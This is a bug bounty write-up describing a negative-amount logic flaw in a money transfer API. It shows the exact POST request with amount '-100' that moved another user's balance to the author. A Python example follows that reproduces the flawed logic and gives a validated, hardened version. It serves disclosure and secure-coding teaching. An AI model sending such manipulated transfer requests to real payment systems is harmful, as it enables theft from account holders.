Stealing money from one account to another account

During my recon on one of the bug bounty websites, I found a subdomain which contained sensitive information, as well as other things, but here I am going to share the most interesting bug I found on further testing.

While I was digging and digging, I found an endpoint to send money from one account to another account. I was not going to test :P, trying to send money from one account to another account. I thought it would be impossible, but still, let’s give it a damn try; I tried IDOR and other methods and failed :).

So what?

Let’s think outside the box.

Now I tried to send money to another account by adding a (-) sign to the amount, and the request was like below:

Request

POST https://api.redacted.com/api/transaction/transfer

Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Content-Length: 96
content-type: application/json
Host: api.redacted.com
Origin: https://redacted.com
Referer: https://redacted.com/site/wallet

Request Body

{
 "addressTo": "evilboyajay",
 "amount": "-100",
 "userFromId": 1925
}

And guess what happened?

It loaded balance to my account (i.e. id 1925), but in the account (evilboyajay) the balance got deducted by the amount I supplied. A little tricky, but it was awesome finding this bug.

In this way, I was able to steal balance from others’ accounts to mine.
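
The root cause and its fix, as an added example that is not the affected site's code: a transfer routine that never checks the sign of the amount, next to one that validates it server-side. The function names, the in-memory balances and the two-decimal currency unit are assumptions made for illustration; the account names are taken from the request above.

```python
from decimal import Decimal, InvalidOperation

CENT = Decimal("0.01")  # assumed smallest currency unit

class TransferError(ValueError):
    """Raised when a transfer request fails validation."""

def transfer_vulnerable(balances, sender, recipient, raw_amount):
    # Flawed logic consistent with the behaviour described above: the sign
    # of the amount is never checked, so a negative value reverses the flow.
    amt = Decimal(str(raw_amount))
    if balances[sender] < amt:  # always passes when amt is negative
        raise TransferError("insufficient funds")
    balances[sender] -= amt     # subtracting -100 credits the sender
    balances[recipient] += amt  # adding -100 debits the recipient

def parse_amount(raw_amount):
    # Accept only finite, strictly positive amounts in whole cents.
    try:
        amt = Decimal(str(raw_amount))
        if not amt.is_finite() or amt <= 0 or amt != amt.quantize(CENT):
            raise TransferError("amount must be a positive value in whole cents")
    except InvalidOperation:
        raise TransferError("amount is not a valid number") from None
    return amt

def transfer_hardened(balances, session_user, recipient, raw_amount):
    # session_user comes from the authenticated session, not the request body.
    amt = parse_amount(raw_amount)
    if recipient not in balances or recipient == session_user:
        raise TransferError("invalid recipient")
    if balances[session_user] < amt:
        raise TransferError("insufficient funds")
    balances[session_user] -= amt
    balances[recipient] += amt

def sample_balances():
    # Constructed balances; account names taken from the request above.
    return {"1925": Decimal("10.00"), "evilboyajay": Decimal("500.00")}

if __name__ == "__main__":
    b = sample_balances()
    transfer_vulnerable(b, "1925", "evilboyajay", "-100")
    print("vulnerable:", b)
    b = sample_balances()
    try:
        transfer_hardened(b, "1925", "evilboyajay", "-100")
    except TransferError as exc:
        print("hardened rejected:", exc, b)
```

In a real service the balance check and both updates would also run inside a single database transaction, so that concurrent requests cannot bypass the funds check.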